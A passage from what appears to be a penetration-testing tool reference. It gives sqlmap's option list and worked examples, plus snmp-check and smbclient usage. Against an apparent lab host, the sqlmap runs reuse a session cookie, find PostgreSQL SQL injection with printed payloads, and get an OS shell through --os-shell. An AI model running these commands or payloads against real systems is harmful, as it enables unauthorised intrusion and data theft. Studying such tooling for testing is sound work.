    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, Bearer, ...)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --proxy-freq=PRO..  Requests between change of proxy from a given list
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --retry-on=RETRYON  Retry request on regexp matching content (e.g. "drop")
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Regular requests between visits to a safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --csrf-method=CS..  HTTP method to use during anti-CSRF token page visit
    --csrf-retries=C..  Retries for anti-CSRF token retrieval (default 0)
    --force-ssl         Force usage of SSL/HTTPS
    --chunked           Use HTTP chunked transfer encoded (POST) requests
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
 
  Optimization:
    These options can be used to optimize the performance of sqlmap
 
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
 
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
 
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --param-filter=P..  Select testable parameter(s) by place (e.g. "POST")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
 
  Detection:
    These options can be used to customize the detection phase
 
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --smart             Perform thorough tests only if positive heuristic(s)
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
 
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
 
    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
 
  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
 
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables
 
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    --statements        Retrieve SQL statements being run on DBMS
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=SQLQ..  SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
 
  Brute force:
    These options can be used to run brute force checks
 
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
    --common-files      Check existence of common files
 
  User-defined function injection:
    These options can be used to create custom user-defined functions
 
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
 
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
 
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
 
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
 
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
 
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
 
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
 
  General:
    These options can be used to set some general working parameters
 
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --base64=BASE64P..  Parameter(s) containing Base64 encoded data
    --base64-safe       Use URL and filename safe Base64 alphabet (RFC 4648)
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing (request)
    --postprocess=PO..  Use given script(s) for postprocessing (response)
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp for filtering targets
    --skip-heuristics   Skip heuristic detection of vulnerabilities
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --table-prefix=T..  Prefix used for temporary tables (default: "sqlmap")
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
 
  Miscellaneous:
    These options do not fit into any other category
 
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --beep              Beep on question and/or when vulnerability is found
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --list-tampers      Display list of available tamper scripts
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --results-file=R..  Location of CSV results file in multiple targets mode
    --shell             Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --unstable          Adjust options for unstable connections
    --update            Update sqlmap
    --wizard            Simple wizard interface for beginner users

Examples

sqlmap -u http://x.x.x.x/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc"

This command uses a previously obtained authentication cookie to crawl the provided page (to depth 2) and test every form it finds for SQL injection vulnerabilities.

└─$ sqlmap -u http://10.129.95.174/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc"
        ___
       __H__                                                                                                                                                                                                                              
 ___ ___["]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                    
|_ -| . [']     | .'| . |                                                                                                                                                                                                                 
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                                                 
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                              
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 21:56:42 /2022-03-27/
 
do you want to check for the existence of site's sitemap(.xml) [y/N]
[21:56:44] [INFO] starting crawler for target URL 'http://10.129.95.174/dashboard.php'
[21:56:44] [INFO] searching for links with depth 1
[21:56:45] [INFO] searching for links with depth 2                                                                                                                                                                                       
please enter number of threads? [Enter for 1 (current)] 2
[21:56:47] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n]                                                                                                                                                                                          
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[21:56:51] [INFO] found a total of 2 targets
[1/2] Form:
GET http://10.129.95.174/dashboard.php?search=
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: search=]:
do you want to fill blank fields with random values? [Y/n]
[21:57:03] [INFO] using '/home/kali/.local/share/sqlmap/output/results-03272022_0957pm.csv' as the CSV results file in multiple targets mode
[21:57:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:57:04] [INFO] testing if the target URL content is stable
[21:57:04] [INFO] target URL content is stable
[21:57:04] [INFO] testing if GET parameter 'search' is dynamic
[21:57:04] [WARNING] GET parameter 'search' does not appear to be dynamic
[21:57:04] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[21:57:04] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[21:57:04] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:57:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:57:34] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:57:34] [INFO] testing 'Generic inline queries'
[21:57:34] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[21:57:34] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[21:57:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:57:34] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[21:57:34] [INFO] testing 'PostgreSQL inline queries'
[21:57:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:57:34] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                                                                                                  
[21:57:44] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[21:57:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:57:54] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[21:57:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn
 
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu
 
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=UIxO';SELECT PG_SLEEP(5)--
 
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu
---
do you want to exploit this SQL injection? [Y/n]
sqlmap -u http://x.x.x.x/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc" --os-shell

This attempts to exploit a previously found SQL injection vulnerability (resumed from the stored session) and return an operating system shell.

└─$ sqlmap -u http://10.129.95.174/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc" --os-shell
        ___
       __H__                                                                                                                                                                                                                              
 ___ ___[,]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                    
|_ -| . [(]     | .'| . |                                                                                                                                                                                                                 
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                 
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                              
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 22:04:24 /2022-03-27/
 
do you want to check for the existence of site's sitemap(.xml) [y/N]
[22:04:26] [INFO] starting crawler for target URL 'http://10.129.95.174/dashboard.php'
[22:04:26] [INFO] searching for links with depth 1
[22:04:27] [INFO] searching for links with depth 2                                                                                                                                                                                       
please enter number of threads? [Enter for 1 (current)] 2
[22:04:29] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n]                                                                                                                                                                                          
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[22:04:35] [INFO] found a total of 2 targets
[1/2] Form:
POST http://10.129.95.174
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
POST data: username=&password=
do you want to test this form? [Y/n/q]
> n
[2/2] Form:
GET http://10.129.95.174/dashboard.php?search=
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: search=]:
do you want to fill blank fields with random values? [Y/n]
[22:05:11] [INFO] resuming back-end DBMS 'postgresql'
[22:05:11] [INFO] using '/home/kali/.local/share/sqlmap/output/results-03272022_1005pm.csv' as the CSV results file in multiple targets mode
[22:05:11] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[22:05:11] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn
 
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu
 
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=UIxO';SELECT PG_SLEEP(5)--
 
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu
---
do you want to exploit this SQL injection? [Y/n]
[22:05:21] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[22:05:21] [INFO] fingerprinting the back-end DBMS operating system
[22:05:22] [INFO] the back-end DBMS operating system is Linux
[22:05:22] [INFO] testing if current user is DBA
[22:05:22] [INFO] retrieved: '1'
[22:05:22] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[22:05:22] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
[22:05:33] [INFO] retrieved: 'postgres'
command standard output:
---
p
o
s
t
g
r
e
s
---
os-shell>

Blog Posts

snmp-check

Description

Snmpcheck is an open source tool distributed under the GPL license. Its goal is to automate the process of gathering information from any device with SNMP support (Windows, Unix-like systems, network appliances, printers…). Like snmpwalk, snmpcheck lets you enumerate SNMP devices, and it presents the output in a human-readable format. It can be useful for penetration testing or systems monitoring.

Platform: Linux
Author: Matteo Cantoni
License: GPLv3
URL: http://www.nothink.org/codes/snmpcheck/

Usage

snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
 
 Usage: snmp-check [OPTIONS] <target IP address>
 
  -p --port        : SNMP port. Default port is 161;
  -c --community   : SNMP community. Default is public;
  -v --version     : SNMP version (1,2c). Default is 1;
 
  -w --write       : detect write access (separate action by enumeration);
 
  -d --disable_tcp : disable TCP connections enumeration!
  -t --timeout     : timeout in seconds. Default is 5;
  -r --retries     : request retries. Default is 1;
  -i --info        : show script version;
  -h --help        : show help menu;

Examples

snmp-check x.x.x.x

The following output shows snmp-check run with default settings.

└─# snmp-check 192.168.168.42
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
 
[+] Try to connect to 192.168.168.42:161 using SNMPv1 and community 'public'
 
[*] System information:
 
  Host IP address               : 192.168.168.42
  Hostname                      : 0xbabe.local
  Description                   : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
  Contact                       : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)
  Location                      : Unknown (configure /etc/snmp/snmpd.local.conf)
  Uptime snmp                   : 02:27:01.75
  Uptime system                 : 02:26:28.35
  System date                   : 2021-2-3 02:57:09.0
 
[*] Network information:
 
  IP forwarding enabled         : no
  Default TTL                   : 64
  TCP segments received         : 4004
  TCP segments sent             : 2614
  TCP segments retrans          : 0
  Input datagrams               : 4245
  Delivered datagrams           : 4245
  Output datagrams              : 2854
 
[*] Network interfaces:
 
  Interface                     : [ up ] lo
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 10 Mbps
  MTU                           : 16436
  In octets                     : 264
  Out octets                    : 264
 
  Interface                     : [ up ] eth0
  Id                            : 2
  Mac Address                   : 00:50:56:bf:a3:08
  Type                          : ethernet-csmacd
  Speed                         : 100 Mbps
  MTU                           : 1500
  In octets                     : 3325200
  Out octets                    : 234338
 
  Interface                     : [ down ] sit0
  Id                            : 3
  Mac Address                   : 00:00:00:00:a3:08
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 1480
  In octets                     : 0
  Out octets                    : 0
 
 
[*] Network IP:
 
  Id                    IP Address            Netmask               Broadcast          
  1                     127.0.0.1             255.0.0.0             0                  
  2                     192.168.168.42        255.255.255.0         1                  
 
[*] Routing information:
 
  Destination           Next hop              Mask                  Metric             
  0.0.0.0               192.168.168.254       0.0.0.0               1                  
  192.168.168.0         0.0.0.0               255.255.255.0         0                  
 
[*] TCP connections and listening ports:
 
  Local address         Local port            Remote address        Remote port           State              
  0.0.0.0               25                    0.0.0.0               0                     listen             
  0.0.0.0               80                    0.0.0.0               0                     listen             
  0.0.0.0               139                   0.0.0.0               0                     listen             
  0.0.0.0               199                   0.0.0.0               0                     listen             
  0.0.0.0               445                   0.0.0.0               0                     listen             
 
[*] Listening UDP ports:
 
  Local address         Local port         
  0.0.0.0               137                
  0.0.0.0               138                
  0.0.0.0               161                
  192.168.168.42        137                
  192.168.168.42        138                
 
[*] Processes:
 
  Id                    Status                Name                  Path                  Parameters         
  1                     runnable              init                  init [2]                                 
  2                     runnable              ksoftirqd/0           ksoftirqd/0                              
  3                     runnable              events/0              events/0                                 
  4                     runnable              khelper               khelper                                  
  5                     runnable              kacpid                kacpid                                   
  99                    runnable              kblockd/0             kblockd/0                                
  109                   runnable              pdflush               pdflush                                  
  110                   runnable              pdflush               pdflush                                  
  111                   runnable              kswapd0               kswapd0                                  
  112                   runnable              aio/0                 aio/0                                    
  255                   runnable              kseriod               kseriod                                  
  276                   runnable              scsi_eh_0             scsi_eh_0                                
  284                   runnable              khubd                 khubd                                    
  348                   runnable              shpchpd_event         shpchpd_event                            
  380                   runnable              kjournald             kjournald                                
  935                   runnable              vmmemctl              vmmemctl                                 
  1177                  runnable              vmtoolsd              /usr/sbin/vmtoolsd                       
  3772                  running               syslogd               /sbin/syslogd                            
  3775                  runnable              klogd                 /sbin/klogd                              
  3780                  runnable              clamd                 /usr/local/sbin/clamd                     
  3782                  runnable              clamav-milter         /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
  3791                  runnable              inetd                 /usr/sbin/inetd                          
  3795                  runnable              nmbd                  /usr/sbin/nmbd        -D                 
  3797                  runnable              smbd                  /usr/sbin/smbd        -D                 
  3801                  running               snmpd                 /usr/sbin/snmpd       -Lsd -Lf /dev/null -p /var/run/snmpd.pid
  3807                  runnable              sshd                  /usr/sbin/sshd                           
  3822                  runnable              smbd                  /usr/sbin/smbd        -D                 
  3886                  runnable              sendmail-mta          sendmail: MTA: accepting connections                     
  3900                  runnable              atd                   /usr/sbin/atd                            
  3903                  runnable              cron                  /usr/sbin/cron                           
  3910                  runnable              apache                /usr/sbin/apache                         
  3911                  runnable              apache                /usr/sbin/apache                         
  3912                  runnable              apache                /usr/sbin/apache                         
  3913                  runnable              apache                /usr/sbin/apache                         
  3914                  runnable              apache                /usr/sbin/apache                         
  3915                  runnable              apache                /usr/sbin/apache                         
  3926                  runnable              getty                 /sbin/getty           38400 tty1         
  3928                  runnable              getty                 /sbin/getty           38400 tty2         
  3929                  runnable              getty                 /sbin/getty           38400 tty3         
  3930                  runnable              getty                 /sbin/getty           38400 tty4         
  3931                  runnable              getty                 /sbin/getty           38400 tty5         
  3932                  runnable              getty                 /sbin/getty           38400 tty6         
  4022                  runnable              apache                /usr/sbin/apache                         
  4032                  runnable              apache                /usr/sbin/apache                         
 
[*] Storage information:
 
  Description                   : ["Real Memory"]
  Device id                     : [#<SNMP::Integer:0x00005603d60ea328 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00005603d60e8640 @value=1024>]
  Memory size                   : 250.82 MB
  Memory used                   : 123.28 MB
 
  Description                   : ["Swap Space"]
  Device id                     : [#<SNMP::Integer:0x00005603d60e3190 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00005603d60e1458 @value=1024>]
  Memory size                   : 203.91 MB
  Memory used                   : 0 bytes
 
  Description                   : ["/"]
  Device id                     : [#<SNMP::Integer:0x00005603d60dc0c0 @value=4>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00005603d60da3b0 @value=4096>]
  Memory size                   : 3.74 GB
  Memory used                   : 765.66 MB
 
  Description                   : ["/sys"]
  Device id                     : [#<SNMP::Integer:0x00005603d6030f40 @value=5>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00005603d602f258 @value=4096>]
  Memory size                   : 0 bytes
  Memory used                   : 0 bytes
 
 
[*] File system information:
 
  Index                         : 1
  Mount point                   : /
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 1
 
[*] Device information:
 
  Id                    Type                  Status                Descr              
  768                   unknown               unknown               AuthenticAMD: AMD EPYC 7371 16-Core Processor
  1025                  unknown               running               network interface lo
  1026                  unknown               running               network interface eth0
  1027                  unknown               down                  network interface sit0
  1536                  unknown               unknown               VMware Virtual IDE CDROM Drive
  1552                  unknown               unknown               SCSI disk (/dev/sda)
  3072                  unknown               unknown               Guessing that there's a floating point co-processor

Blog Posts

smbclient

Description

smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

Usage

Tool Usage:

Usage: smbclient service <password>
  -R, --name-resolve=NAME-RESOLVE-ORDER     Use these name resolution services only
  -M, --message=HOST                        Send message
  -I, --ip-address=IP                       Use this IP to connect to
  -E, --stderr                              Write messages to stderr instead of stdout
  -L, --list=HOST                           Get a list of shares available on a host
  -m, --max-protocol=LEVEL                  Set the max protocol level
  -T, --tar=<c|x>IXFvgbNan                  Command line tar
  -D, --directory=DIR                       Start from directory
  -c, --command=STRING                      Execute semicolon separated commands
  -b, --send-buffer=BYTES                   Changes the transmit/send buffer
  -t, --timeout=SECONDS                     Changes the per-operation timeout
  -p, --port=PORT                           Port to connect to
  -g, --grepable                            Produce grepable output
  -q, --quiet                               Suppress help message
  -B, --browse                              Browse SMB servers using DNS
 
Help options:
  -?, --help                                Show this help message
      --usage                               Display brief usage message
 
Common samba options:
  -d, --debuglevel=DEBUGLEVEL               Set debug level
  -s, --configfile=CONFIGFILE               Use alternate configuration file
  -l, --log-basename=LOGFILEBASE            Base name for log files
  -V, --version                             Print version
      --option=name=value                   Set smb.conf option from command line
 
Connection options:
  -O, --socket-options=SOCKETOPTIONS        socket options to use
  -n, --netbiosname=NETBIOSNAME             Primary netbios name
  -W, --workgroup=WORKGROUP                 Set the workgroup name
  -i, --scope=SCOPE                         Use this Netbios scope
 
Authentication options:
  -U, --user=USERNAME                       Set the network username
  -N, --no-pass                             Don't ask for a password
  -k, --kerberos                            Use kerberos (active directory) authentication
  -A, --authentication-file=FILE            Get the credentials from a file
  -S, --signing=on|off|required             Set the client signing state
  -P, --machine-pass                        Use stored machine account password
  -e, --encrypt                             Encrypt SMB transport
  -C, --use-ccache                          Use the winbind ccache for authentication
      --pw-nt-hash                          The supplied password is the NT hash

SMB Shell Usage:

?              allinfo        altname        archive        backup        
blocksize      cancel         case_sensitive cd             chmod         
chown          close          del            deltree        dir           
du             echo           exit           get            getfacl       
geteas         hardlink       help           history        iosize        
lcd            link           lock           lowercase      ls            
l              mask           md             mget           mkdir         
more           mput           newer          notify         open          
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir   
posix_unlink   posix_whoami   print          prompt         put           
pwd            q              queue          quit           readlink      
rd             recurse        reget          rename         reput         
rm             rmdir          showacls       setea          setmode       
scopy          stat           symlink        tar            tarmode       
timeout        translate      unlock         volume         vuid          
wdel           logon          listconnect    showconnect    tcon          
tdis           tid            utimes         logoff         ..            
!

Examples

smbclient -L <ip> -U <user>

This command will establish an SMB session with the server and list the shares.

smbclient \\\\<ip>\\<share> [password]

This will connect to the remote share and return an interactive smb prompt.

└──╼ [★]$ smbclient \\\\10.129.152.222\\WorkShares
Enter WORKGROUP\htb-403knowledge's password:
Try "help" to get a list of possible commands.
smb: \>

Blog Posts

rpcclient

Description

rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.

Usage

Usage: rpcclient [OPTION...] <server>
Options:
  -c, --command=COMMANDS                 Execute semicolon separated cmds
